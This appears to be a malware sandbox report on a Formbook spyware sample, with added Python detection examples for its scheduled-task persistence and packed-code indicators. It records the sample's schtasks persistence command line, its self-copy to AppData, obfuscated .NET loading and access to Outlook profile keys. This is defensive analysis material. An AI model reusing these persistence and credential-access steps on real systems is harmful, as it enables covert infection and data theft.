          Source: pZTgBSxb0oe9deC.exe, 00000005.00000002.245115635.000000000170F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs pZTgBSxb0oe9deC.exe
          Source: pZTgBSxb0oe9deC.exe, 00000005.00000002.244167481.0000000001029000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameHelp.Exej% vs pZTgBSxb0oe9deC.exe
          Source: pZTgBSxb0oe9deC.exe, 00000005.00000000.199396882.000000000097E000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameA1F.exe, vs pZTgBSxb0oe9deC.exe
          Source: pZTgBSxb0oe9deC.exe | Binary or memory string: OriginalFilenameA1F.exe, vs pZTgBSxb0oe9deC.exe
          Source: 00000005.00000002.244372940.0000000001350000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.244372940.0000000001350000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.244341859.0000000001320000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.244341859.0000000001320000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.202381231.0000000004158000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.202381231.0000000004158000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.243339890.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.243339890.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.pZTgBSxb0oe9deC.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.pZTgBSxb0oe9deC.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.pZTgBSxb0oe9deC.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.pZTgBSxb0oe9deC.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: pZTgBSxb0oe9deC.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: pRVJhcAjvJZLI.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/6@7/2
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 0_2_0138B59A AdjustTokenPrivileges
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 0_2_0138B563 AdjustTokenPrivileges
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | File created: C:\Users\user\AppData\Roaming\pRVJhcAjvJZLI.exe
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4708:120:WilError_01
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | File created: C:\Users\user\AppData\Local\Temp\tmpD165.tmp
          Source: pZTgBSxb0oe9deC.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | File read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: pZTgBSxb0oe9deC.exe | Virustotal: Detection: 34%
          Source: pZTgBSxb0oe9deC.exe | ReversingLabs: Detection: 27%
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | File read: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe
          Source: unknown | Process created: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe 'C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe'
          Source: unknown | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\pRVJhcAjvJZLI' /XML 'C:\Users\user\AppData\Local\Temp\tmpD165.tmp'
          Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknown | Process created: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe {path}
          Source: unknown | Process created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\pRVJhcAjvJZLI' /XML 'C:\Users\user\AppData\Local\Temp\tmpD165.tmp'
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Process created: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe {path}
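The process tree above shows the persistence step the report's Sigma hit refers to: the sample writes a task definition to a temp file and has schtasks.exe register it as 'Updates\pRVJhcAjvJZLI'. The following detection is an added example, not code from the sandbox or the sample: it tokenizes process-creation command lines (accepting both double quotes and the single quotes the report renders) and flags schtasks /Create whose /XML argument points into a temp directory. The event records are constructed to mirror the report's command lines, and their field names (image, parent_image, command_line) are an assumed schema rather than any real log exporter's.

```python
"""Detection for the persistence step shown above: schtasks.exe /Create with
an /XML task definition read from a temp directory (the report's
'Updates\\pRVJhcAjvJZLI' task built from ...\\Temp\\tmpD165.tmp).

Added example, not part of the sandbox report. EVENTS is a constructed
process-creation log; its field names (image, parent_image, command_line)
are an assumed schema, not a real exporter's."""
import re
from typing import Optional

# Constructed records mirroring the report's process tree plus two benign controls.
EVENTS = [
    {
        "image": r"C:\Windows\SysWOW64\schtasks.exe",
        "parent_image": r"C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe",
        "command_line": r"'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\pRVJhcAjvJZLI' /XML 'C:\Users\user\AppData\Local\Temp\tmpD165.tmp'",
    },
    {   # task created from a non-temp location: must not fire
        "image": r"C:\Windows\System32\schtasks.exe",
        "parent_image": r"C:\Windows\System32\svchost.exe",
        "command_line": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Backup\Nightly" /XML "C:\ProgramData\Backup\nightly.xml"',
    },
    {   # query only, no creation: must not fire
        "image": r"C:\Windows\System32\schtasks.exe",
        "parent_image": r"C:\Windows\explorer.exe",
        "command_line": r'schtasks.exe /Query /TN "Updates\pRVJhcAjvJZLI"',
    },
]

# Temp locations: ...\Temp\..., ...\Tmp\..., or an unexpanded %TEMP% / %TMP%.
TEMP_PATH_RE = re.compile(r"\\(?:temp|tmp)\\|%(?:temp|tmp)%", re.IGNORECASE)
# Double-quoted, single-quoted (as the report renders it) or bare tokens.
TOKEN_RE = re.compile(r'"([^"]*)"|\'([^\']*)\'|(\S+)')


def tokenize(cmd: str) -> list:
    """Split a Windows command line into arguments, honouring both quote styles."""
    return [dq or sq or bare for dq, sq, bare in TOKEN_RE.findall(cmd)]


def option_value(tokens: list, name: str) -> Optional[str]:
    """Value following option `name` (case-insensitive), or None if absent."""
    lowered = [t.lower() for t in tokens]
    if name.lower() not in lowered:
        return None
    i = lowered.index(name.lower())
    return tokens[i + 1] if i + 1 < len(tokens) else None


def check_event(ev: dict) -> Optional[dict]:
    """Return a finding when schtasks creates a task from a temp-located XML, else None."""
    if ev["image"].rsplit("\\", 1)[-1].lower() != "schtasks.exe":
        return None
    tokens = tokenize(ev["command_line"])
    if "/create" not in [t.lower() for t in tokens]:
        return None
    xml_path = option_value(tokens, "/XML")
    if not xml_path or not TEMP_PATH_RE.search(xml_path):
        return None
    parent = ev["parent_image"]
    return {
        "task_name": option_value(tokens, "/TN"),
        "xml_path": xml_path,
        "parent_image": parent,
        # Installers that legitimately register tasks rarely run from a user profile;
        # a parent under C:\Users raises the severity of the hit.
        "parent_in_user_profile": parent.lower().startswith("c:\\users\\"),
    }


def scan(events: list) -> list:
    """All findings over a batch of process-creation events."""
    return [f for f in (check_event(e) for e in events) if f]


if __name__ == "__main__":
    for finding in scan(EVENTS):
        print(finding)
```

Only the first record fires; the /XML path under \AppData\Local\Temp\ and the parent running from the user's Desktop are the two properties that separate it from the benign controls. The temp-path test is deliberately loose (any \Temp\ or \Tmp\ component), so in production it should be paired with an allow-list of known installers that stage task XML in temp.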
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: C:\Windows\SysWOW64\help.exe | File written: C:\Users\user\AppData\Roaming\O9541UQ2\O95logri.ini
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
          Source: C:\Windows\SysWOW64\help.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: pZTgBSxb0oe9deC.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
          Source: pZTgBSxb0oe9deC.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: pZTgBSxb0oe9deC.exe, 00000005.00000002.244710088.000000000157F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: pZTgBSxb0oe9deC.exe
          Source: Binary string: help.pdbGCTL source: pZTgBSxb0oe9deC.exe, 00000005.00000002.244167481.0000000001029000.00000004.00000020.sdmp
          Source: Binary string: help.pdb source: pZTgBSxb0oe9deC.exe, 00000005.00000002.244167481.0000000001029000.00000004.00000020.sdmp
          Source: Binary string: mscorrc.pdb source: pZTgBSxb0oe9deC.exe, 00000000.00000002.203689491.0000000005300000.00000002.00000001.sdmp

          Data Obfuscation:

          .NET source code contains method to dynamically call methods (often used by packers)
          Source: pZTgBSxb0oe9deC.exe, yy?P????c/f?gs?YxpLe.cs | .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, ES???Dkasu? }, null, null)
          Source: pRVJhcAjvJZLI.exe.0.dr, yy?P????c/f?gs?YxpLe.cs | .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, ES???Dkasu? }, null, null)
          Source: 0.0.pZTgBSxb0oe9deC.exe.990000.0.unpack, yy?P????c/f?gs?YxpLe.cs | .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, ES???Dkasu? }, null, null)
          Source: 0.2.pZTgBSxb0oe9deC.exe.990000.0.unpack, yy?P????c/f?gs?YxpLe.cs | .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, ES???Dkasu? }, null, null)
          Source: 5.0.pZTgBSxb0oe9deC.exe.890000.0.unpack, yy?P????c/f?gs?YxpLe.cs | .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, ES???Dkasu? }, null, null)
          Source: 5.2.pZTgBSxb0oe9deC.exe.890000.1.unpack, yy?P????c/f?gs?YxpLe.cs | .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, ES???Dkasu? }, null, null)
          .NET source code contains potential unpacker
          Source: pZTgBSxb0oe9deC.exe, yy?P????c/f?gs?YxpLe.cs | .Net Code: q?ODjieyv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: pRVJhcAjvJZLI.exe.0.dr, yy?P????c/f?gs?YxpLe.cs | .Net Code: q?ODjieyv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.pZTgBSxb0oe9deC.exe.990000.0.unpack, yy?P????c/f?gs?YxpLe.cs | .Net Code: q?ODjieyv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.pZTgBSxb0oe9deC.exe.990000.0.unpack, yy?P????c/f?gs?YxpLe.cs | .Net Code: q?ODjieyv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.pZTgBSxb0oe9deC.exe.890000.0.unpack, yy?P????c/f?gs?YxpLe.cs | .Net Code: q?ODjieyv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.2.pZTgBSxb0oe9deC.exe.890000.1.unpack, yy?P????c/f?gs?YxpLe.cs | .Net Code: q?ODjieyv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 0_2_01382AF9 push edi; ret 0_2_01382AFA
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 0_2_01382FF0 push eax; ret 0_2_01382FF2
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 0_2_0138286D push edi; ret 0_2_0138286E
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 0_2_01382AED push edi; ret 0_2_01382AEE
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 0_2_01382964 push edi; ret 0_2_0138298E
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 0_2_01382725 push edi; ret 0_2_01382742
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 0_2_01382BD4 push eax; ret 0_2_01382BD6
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 0_2_01382F54 push eax; ret 0_2_01382F56
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 0_2_01382915 push eax; ret 0_2_01382916
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 0_2_01382908 push ecx; ret 0_2_0138290A
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 0_2_02D64571 push cs; iretd 0_2_02D64572
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 0_2_02D62D20 pushad; iretd 0_2_02D62D21
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_0040A96D push ss; retf 5_2_0040A96E
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_00416AC0 push esp; ret 5_2_00416B05
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_004163E2 pushfd; iretd 5_2_004164AB
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_0041644F pushfd; iretd 5_2_004164AB
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_0041E539 pushfd; ret 5_2_0041E53F
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_0041CE52 push eax; ret 5_2_0041CE58
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_00416658 push ecx; iretd 5_2_00416680
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_0041CE5B push eax; ret 5_2_0041CEC2
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_0041CE05 push eax; ret 5_2_0041CE58
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_004166B9 push ecx; iretd 5_2_00416680
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_0041CEBC push eax; ret 5_2_0041CEC2
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_0041B751 push ebx; retf 5_2_0041B752
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | Code function: 5_2_014DD0D1 push ecx; ret 5_2_014DD0E4
          Source: initial sample | Static PE information: section name: .text entropy: 7.85123600279
          Source: initial sample | Static PE information: section name: .text entropy: 7.85123600279
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exe | File created: C:\Users\user\AppData\Roaming\pRVJhcAjvJZLI.exe
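The two static indicators in this group, a .text section with entropy 7.85 of a possible 8.0 bits per byte and the push/return instruction pairs listed above (push edi; ret, pushfd; iretd, push ss; retf and so on), are cheap to reproduce over any section or memory dump. The block below is an added example, not the sandbox's or the sample's code. Its byte buffers are constructed, and its pair scan matches adjacent opcode bytes only, which is a simplification of the sandbox heuristic (the report pairs a push with a return that follows later in the same function, as the two addresses on each line show).

```python
"""Two static indicators from the report reproduced as checks over raw bytes:
Shannon entropy of a section (the sample's .text scores 7.85 of a possible
8.0 bits/byte, typical of packed or encrypted code) and a scan for push/return
instruction pairs such as `push edi; ret` or `pushfd; iretd`.

Added example, not the sandbox's or the sample's code. The byte buffers are
constructed; the pair scan matches adjacent opcode bytes, a simplification of
the sandbox heuristic, which pairs a push with a later return in the same
function."""
import math
from collections import Counter
from typing import List, Tuple

# Single-byte x86 opcodes only; no disassembly is performed.
REG_NAMES = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
PUSH_OPCODES = {op: "push " + REG_NAMES[op - 0x50] for op in range(0x50, 0x58)}
PUSH_OPCODES.update({0x9C: "pushfd", 0x60: "pushad", 0x0E: "push cs", 0x16: "push ss"})
RETURN_OPCODES = {0xC3: "ret", 0xCB: "retf", 0xCF: "iretd"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for an empty buffer, 8.0 for a uniform byte distribution."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def find_push_ret(code: bytes, base: int = 0) -> List[Tuple[int, str]]:
    """(address, mnemonic) for every push opcode immediately followed by a return opcode.
    Because this is a byte scan, bytes inside longer instructions (immediates,
    displacements) can also match; treat hits as hints and look at their density."""
    hits = []
    for i in range(len(code) - 1):
        if code[i] in PUSH_OPCODES and code[i + 1] in RETURN_OPCODES:
            hits.append((base + i, f"{PUSH_OPCODES[code[i]]}; {RETURN_OPCODES[code[i + 1]]}"))
    return hits


def assess(data: bytes, base: int = 0, entropy_threshold: float = 7.0) -> dict:
    """Summarise one section or memory dump with both indicators."""
    entropy = shannon_entropy(data)
    return {
        "entropy": round(entropy, 3),
        "high_entropy": entropy >= entropy_threshold,
        "push_ret_hits": find_push_ret(data, base),
    }


# Constructed inputs, not bytes taken from the sample.
PACKED_LIKE = bytes(range(256)) * 4       # every byte value equally often: entropy 8.0
PLAIN_LIKE = b"A" * 512 + b"BCD" * 64     # skewed distribution: entropy about 1.28
CODE_STUB = (                             # five push/return pairs among ordinary bytes
    b"\x55\x8b\xec"      # push ebp; mov ebp, esp  (normal prologue, no hit)
    + b"\x57\xc3"        # push edi; ret
    + b"\x90" * 4        # nops
    + b"\x9c\xcf"        # pushfd; iretd
    + b"\x0e\xcf"        # push cs; iretd
    + b"\x16\xcb"        # push ss; retf
    + b"\x50\xc3"        # push eax; ret
    + b"\x90" * 4
)

if __name__ == "__main__":
    for name, buf in [("packed-like", PACKED_LIKE), ("plain-like", PLAIN_LIKE), ("code stub", CODE_STUB)]:
        print(name, assess(buf, base=0x401000))
```

Entropy near 8.0 on an executable section says the bytes are compressed or encrypted rather than compiled code, which is why the report flags 7.85 for .text; the push/ret pairs are the complementary signal, since a decompression stub that builds return addresses on the stack is what usually surrounds such a section. Neither indicator is proof on its own, and the stub in this example would score as low-entropy code while still producing five hits.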

          Boot Survival:
